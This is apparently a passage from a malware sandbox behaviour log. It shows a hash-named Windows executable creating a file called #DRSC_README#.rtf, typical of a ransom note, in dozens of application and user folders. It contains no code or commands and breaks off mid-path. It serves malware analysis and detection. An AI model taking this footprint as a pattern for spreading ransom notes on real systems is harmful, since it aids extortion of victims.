710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\Reader\DesktopNotification\NotificationsDB\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\si-LK\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\DesktopView_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\DC\Security\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Comms\UnistoreDB\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Oracle\Java\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\AccountPictures\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\te\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Documents\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cs\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Videos\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 